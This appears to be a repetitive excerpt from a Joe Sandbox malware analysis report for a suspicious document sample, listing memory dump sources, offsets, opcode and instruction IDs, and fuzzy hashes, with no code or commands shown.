                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: db8c9792e82f0bc90961d4a51ad003c71f174e92e4d7826f727fd512e9b39467
                                                                                                                                                    • Instruction ID: 4f2d3d0732825b83fe1f580605857802958bdf76e57e52f81d1ff3773ef9ff32
                                                                                                                                                    • Opcode Fuzzy Hash: db8c9792e82f0bc90961d4a51ad003c71f174e92e4d7826f727fd512e9b39467
                                                                                                                                                    • Instruction Fuzzy Hash: 2E516334B0050AEFCB15EF65E858AAEB7B6FF88701F00811AF5029B364DF709946CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e5d97df00794daefdcc9567cc3596d32506893fcbb54359180509bbcaf547bf4
                                                                                                                                                    • Instruction ID: 66ad28fb0cc711f35f443fc0b75b5dbf31544413dbf9762be6e9615b3829a723
                                                                                                                                                    • Opcode Fuzzy Hash: e5d97df00794daefdcc9567cc3596d32506893fcbb54359180509bbcaf547bf4
                                                                                                                                                    • Instruction Fuzzy Hash: 0641DC31F00B149FCB64CB7CE54429FB7F2EF84614B04886ED55AC7A94EB34E9068B81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 96fa1400cfb94b881013de1ea36f1edf0e8a47053eec4a9a2da97b910ae73824
                                                                                                                                                    • Instruction ID: 88b8988e479700cda1d63260fb9065440dab9f9ca0bbd9f00886fc039f2748e6
                                                                                                                                                    • Opcode Fuzzy Hash: 96fa1400cfb94b881013de1ea36f1edf0e8a47053eec4a9a2da97b910ae73824
                                                                                                                                                    • Instruction Fuzzy Hash: 04419435B006448FC704DB6DD9909AEBBF5EF89310B15C5AAE409DB362DB31EC46CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: def2a44d0475185ac42ebd0ac157a3219edf7a168fe0cf388dc763b01e3158c7
                                                                                                                                                    • Instruction ID: 9af7b28f9330eb7011a9c1cf14c347666dc531188716d685879a8350b82b86de
                                                                                                                                                    • Opcode Fuzzy Hash: def2a44d0475185ac42ebd0ac157a3219edf7a168fe0cf388dc763b01e3158c7
                                                                                                                                                    • Instruction Fuzzy Hash: 4A5195B0E01248DFDB18DFBAD594AADBBB2BF88304F20816AD415AB365DB359945CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7bd357ae45a7103edc24a363f04b35600130d7d230ec92b7ccae489d27273cac
                                                                                                                                                    • Instruction ID: 6e0e2c5a4c1b78a62d2240af48475837046ce6a5abe2268732d00dcbe3410cc8
                                                                                                                                                    • Opcode Fuzzy Hash: 7bd357ae45a7103edc24a363f04b35600130d7d230ec92b7ccae489d27273cac
                                                                                                                                                    • Instruction Fuzzy Hash: C131F636A10144DFCB09DF68D888EA9BBB2FF48724B1640A9E6099F372C731ED55CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 262b9d9d74a656726f6c39e659457f95b7ce1125d6004588362b9fb80e8de33d
                                                                                                                                                    • Instruction ID: 57b43fcbe8e9f89f5db797753b9b4dbdfa5f4df2864799089f3f81d40b81a907
                                                                                                                                                    • Opcode Fuzzy Hash: 262b9d9d74a656726f6c39e659457f95b7ce1125d6004588362b9fb80e8de33d
                                                                                                                                                    • Instruction Fuzzy Hash: 49416971A00A158FDB14DFA5C844AAEBBF6FF88701F00852AD415E7294E734AD59CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 007f7824e7cc1a5c20792a64ac48dfca702f31f9ac15a6d4010a744e9f8645dd
                                                                                                                                                    • Instruction ID: 279ef229dae341d36687f0619b60c7bb74dd40b12eaa96c4726c9ac6ce196c32
                                                                                                                                                    • Opcode Fuzzy Hash: 007f7824e7cc1a5c20792a64ac48dfca702f31f9ac15a6d4010a744e9f8645dd
                                                                                                                                                    • Instruction Fuzzy Hash: 324146B4E01608DFCB04DFA9D8846AEBBF2FB88301F148165D415A7354EB79AA46CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e337d64e645d7fa110f3a1effa4200e73c90f2cbb25d215bca370a336e50fc77
                                                                                                                                                    • Instruction ID: a9ea3d1c342056da4ef2440bbb450910292af5376896bf47a89b29c8c4759ecb
                                                                                                                                                    • Opcode Fuzzy Hash: e337d64e645d7fa110f3a1effa4200e73c90f2cbb25d215bca370a336e50fc77
                                                                                                                                                    • Instruction Fuzzy Hash: B941E374A016288FEB24DF64C890FA9B7B1BB59720F1005D9EA09AB3D1E631ED91CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b0c18f92d59f0509b4fec17f3cad9089d930299c5d52a144aaeae970818ad8f4
                                                                                                                                                    • Instruction ID: f504b45ca0e49751199c1deda68faed076a5f99ae7a76d5d16ae191e4d592014
                                                                                                                                                    • Opcode Fuzzy Hash: b0c18f92d59f0509b4fec17f3cad9089d930299c5d52a144aaeae970818ad8f4
                                                                                                                                                    • Instruction Fuzzy Hash: 9C313B35A10218DBDB04DBA4DC55AEEBBB6FF88310F148169D911B73A0CB719D05CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356184416.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15d000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 954716138bd8ad60acd916b953413041ea0b70b9ed4f78faf9c8f0f42f88a4d0
                                                                                                                                                    • Instruction ID: 06aa4f8010f72d83ca8609e0b76e75344e6e50435b957a429ca10db4b1a115e8
                                                                                                                                                    • Opcode Fuzzy Hash: 954716138bd8ad60acd916b953413041ea0b70b9ed4f78faf9c8f0f42f88a4d0
                                                                                                                                                    • Instruction Fuzzy Hash: 1A314A7150E3C48FCB138F60D9A4715BF71AB57214F2985DBD8858F2A7C329981ECB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5a618a078d7e640d8640b6ba2368e97d80378e00e6f69c10448d43602814449a
                                                                                                                                                    • Instruction ID: 0b55911ded20bd20f3c8ff46321b8d973fc31495000fe008390cb1933e4b4bae
                                                                                                                                                    • Opcode Fuzzy Hash: 5a618a078d7e640d8640b6ba2368e97d80378e00e6f69c10448d43602814449a
                                                                                                                                                    • Instruction Fuzzy Hash: 5F3146B4E01608DFCB04DFAAD8846AEBBF2FB88301F148165D419A7354EB74AE46CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1608f2d1415fe5bab98781393d6a5ed02c6fa203fc869d8d18388d949eb7c3b0
                                                                                                                                                    • Instruction ID: d54107d518a7cb7769509f29dc03c9497915ddb2ae659c84a18a5dca5eba814f
                                                                                                                                                    • Opcode Fuzzy Hash: 1608f2d1415fe5bab98781393d6a5ed02c6fa203fc869d8d18388d949eb7c3b0
                                                                                                                                                    • Instruction Fuzzy Hash: 5031F174E05208CFDB00CFA9D944BEEBBB1EB88301F188069D455B7390E775AA69CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 93235ffd998ec877108e5587922cef906c280667f10fd98a5dd916b249edb2f1
                                                                                                                                                    • Instruction ID: c719ba360f1ac0dc268bf1048e3eec33a1795e46300c77d0b370145c28b7ecd4
                                                                                                                                                    • Opcode Fuzzy Hash: 93235ffd998ec877108e5587922cef906c280667f10fd98a5dd916b249edb2f1
                                                                                                                                                    • Instruction Fuzzy Hash: 10311570A05A08CFDB10CF99D584BADBBF2FF89306F159069E805AB255E774AD95CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 08392d4c93110887141cd6ef95cdaab2f0173abdc7b81df7805ddb51fcfb6753
                                                                                                                                                    • Instruction ID: d06537ec726fb76ddc1d465ba9773892539857253965522925868b3224546dda
                                                                                                                                                    • Opcode Fuzzy Hash: 08392d4c93110887141cd6ef95cdaab2f0173abdc7b81df7805ddb51fcfb6753
                                                                                                                                                    • Instruction Fuzzy Hash: 2B312270E006098FCB04DFA9D948AEEBBB2BF88350F08816AD465A7250E770A955CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d8929c544a68979e6013cb0cc21a1417ad76a8840fdd253f2813177bffe625a7
                                                                                                                                                    • Instruction ID: e5cc5a6d4ba5eefbc049848fb62817c8378d0a318df5393096195e011add8f28
                                                                                                                                                    • Opcode Fuzzy Hash: d8929c544a68979e6013cb0cc21a1417ad76a8840fdd253f2813177bffe625a7
                                                                                                                                                    • Instruction Fuzzy Hash: B2318934600B049FDB29AF29D44496EBBB6FF95715B10496CE8128B3A5EF31EC06CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d353f0d381ff41661d3bd0c5766f644fad6e500182b9fb31aa2d9a0ca8c254f0
                                                                                                                                                    • Instruction ID: 34f8e6510c8f8a01847606ab7b6fbba69d69ebce58acd889943ab363cb94de56
                                                                                                                                                    • Opcode Fuzzy Hash: d353f0d381ff41661d3bd0c5766f644fad6e500182b9fb31aa2d9a0ca8c254f0
                                                                                                                                                    • Instruction Fuzzy Hash: 10313A74E012189FCB09DFA8D8516EEBBB2FF88310F14816AD816A7364DB355D41CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 349e1f6dea124d1bd501a55a02e1d416adf39cb079e68577c22e2e56bc6beeca
                                                                                                                                                    • Instruction ID: ff587383fa5d601ba7600d26f1af95b22bdef300818a1f831bd0fc325c9a0a45
                                                                                                                                                    • Opcode Fuzzy Hash: 349e1f6dea124d1bd501a55a02e1d416adf39cb079e68577c22e2e56bc6beeca
                                                                                                                                                    • Instruction Fuzzy Hash: F8318F31300A049FDB28CF29D884AAE7BB5FF94755F048529F8058B2A1D770EC91CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 41f2c0d3be81cd20610b60a69809b7bad228e0e001b36da982686530063c570e
                                                                                                                                                    • Instruction ID: bbdf4da702040d75a4a2dd7a391ffa4f43ceccfda178af90990a5ae4a04b6c70
                                                                                                                                                    • Opcode Fuzzy Hash: 41f2c0d3be81cd20610b60a69809b7bad228e0e001b36da982686530063c570e
                                                                                                                                                    • Instruction Fuzzy Hash: 3E316D31300A059FDB18CF29D884AAE7BA5EF58345F148569F8058B2A1DB74ECA1CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d2c3e564747f85df23435deac0b34a0e8f8fe135ae8ad65d838d5b3d8572d968
                                                                                                                                                    • Instruction ID: 6714da2df02433f882a898a261d2599856d2e765a2dea1b182496a2b21ad2867
                                                                                                                                                    • Opcode Fuzzy Hash: d2c3e564747f85df23435deac0b34a0e8f8fe135ae8ad65d838d5b3d8572d968
                                                                                                                                                    • Instruction Fuzzy Hash: C9210A31700610DFD7218BADE888A6ABBF9EFC0364B15897AD10DC7656DB72EC41C750
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7c4f941c47d8a2e2351296b48ac365c815162d51ef266257be8fab6f301fa0e7
                                                                                                                                                    • Instruction ID: 275a59743ad7124765a7e5b29c5e87068554d1e76606b580257a658041f2b9e2
                                                                                                                                                    • Opcode Fuzzy Hash: 7c4f941c47d8a2e2351296b48ac365c815162d51ef266257be8fab6f301fa0e7
                                                                                                                                                    • Instruction Fuzzy Hash: 0B21B3753406059BD719AB28D858A3E77A3EFC4754B10812DEA0A8B3A4CF36ED43C7C5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ce002a18afcf92786a0a8fbf3b3d2502699c767003627ba085a01659513440ee
                                                                                                                                                    • Instruction ID: 9f5b15a3a31dead1ca6ea936329dcb8b57c79c1bfe045c2432a2e25f43f7f8c9
                                                                                                                                                    • Opcode Fuzzy Hash: ce002a18afcf92786a0a8fbf3b3d2502699c767003627ba085a01659513440ee
                                                                                                                                                    • Instruction Fuzzy Hash: BF218874B00A0ACFCB01EFA9D5544AEF7B5FF89700B10452AD506A7324EF749A46CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b688a944d98410e3117ccc5f3570c5873e98ef5831126b4022b1609003014a40
                                                                                                                                                    • Instruction ID: e6df2cea783e68aab77538e8311a7a9f5b6fad714ff88a18a70c494cd4a625bd
                                                                                                                                                    • Opcode Fuzzy Hash: b688a944d98410e3117ccc5f3570c5873e98ef5831126b4022b1609003014a40
                                                                                                                                                    • Instruction Fuzzy Hash: 9C21B674E0060A8FCB00EFB8D4449AEBBF1FF99300B00466AD61697364EB359A06CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 61271f64b1eb2252594fecbc79d74c1fc6b900b1bdc16d496b54b8ec8741bc0e
                                                                                                                                                    • Instruction ID: 9a1b9dc82d319b5e839d33f1a3af48ccdea3a8a4f09195037ba6a88c50bbf17d
                                                                                                                                                    • Opcode Fuzzy Hash: 61271f64b1eb2252594fecbc79d74c1fc6b900b1bdc16d496b54b8ec8741bc0e
                                                                                                                                                    • Instruction Fuzzy Hash: 81217A71A00609DFDB10DFB8D504BAEBBF4AB04340F108066D909DB290F634EE65CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356184416.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15d000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ec32cc5566413ef69310a8c6991a124c99a39a4f0aa62c2c07a7257336a337c3
                                                                                                                                                    • Instruction ID: cc76a65f4fa73f771cf075a14be77f34388583a390288a1d94b7ff7a12a845ce
                                                                                                                                                    • Opcode Fuzzy Hash: ec32cc5566413ef69310a8c6991a124c99a39a4f0aa62c2c07a7257336a337c3
                                                                                                                                                    • Instruction Fuzzy Hash: DD21F2B2604244EFDB25CF14E9C0B26BB65EB84715F34C5A9EC054F286C736D84ACBA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 56d8ad0dd33a519a2118f125ee8442d614bccf9aba015277b8c68888b5b38ef5
                                                                                                                                                    • Instruction ID: 305d65761c658de4591700aadd210ea27b3193dc7dbc8dc73d0112a673c15dea
                                                                                                                                                    • Opcode Fuzzy Hash: 56d8ad0dd33a519a2118f125ee8442d614bccf9aba015277b8c68888b5b38ef5
                                                                                                                                                    • Instruction Fuzzy Hash: B7211A3AA00509EFCB15DFA8E848C9DBBB1FF89314B0181A9E6169B271D731E855DF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 892978e048bc81d2a27bdbd0b657d0832ea126a403acf29bc6578dad4f4fa73b
                                                                                                                                                    • Instruction ID: c65a6b016ed46ecdd59180ca40ce3f64b5f5c4495b520ea5835b766785e86662
                                                                                                                                                    • Opcode Fuzzy Hash: 892978e048bc81d2a27bdbd0b657d0832ea126a403acf29bc6578dad4f4fa73b
                                                                                                                                                    • Instruction Fuzzy Hash: F02165B2E042089FCB19DFA5D4548DEBBF8EF59310F018167E516DB2A1F630AD05CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fbdb928043cf1bf4e78099cb59fde3ef1d19bf96c0d728db9f1a66551484b67d
                                                                                                                                                    • Instruction ID: ac538d9a061027afe88795793e0051cf990bbeb09bb3e51d031954ee2df05d26
                                                                                                                                                    • Opcode Fuzzy Hash: fbdb928043cf1bf4e78099cb59fde3ef1d19bf96c0d728db9f1a66551484b67d
                                                                                                                                                    • Instruction Fuzzy Hash: 992103B6E04748DFC702EBA8D4044DEBBB0BF96220B1581AAC615D72A1F7304909CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
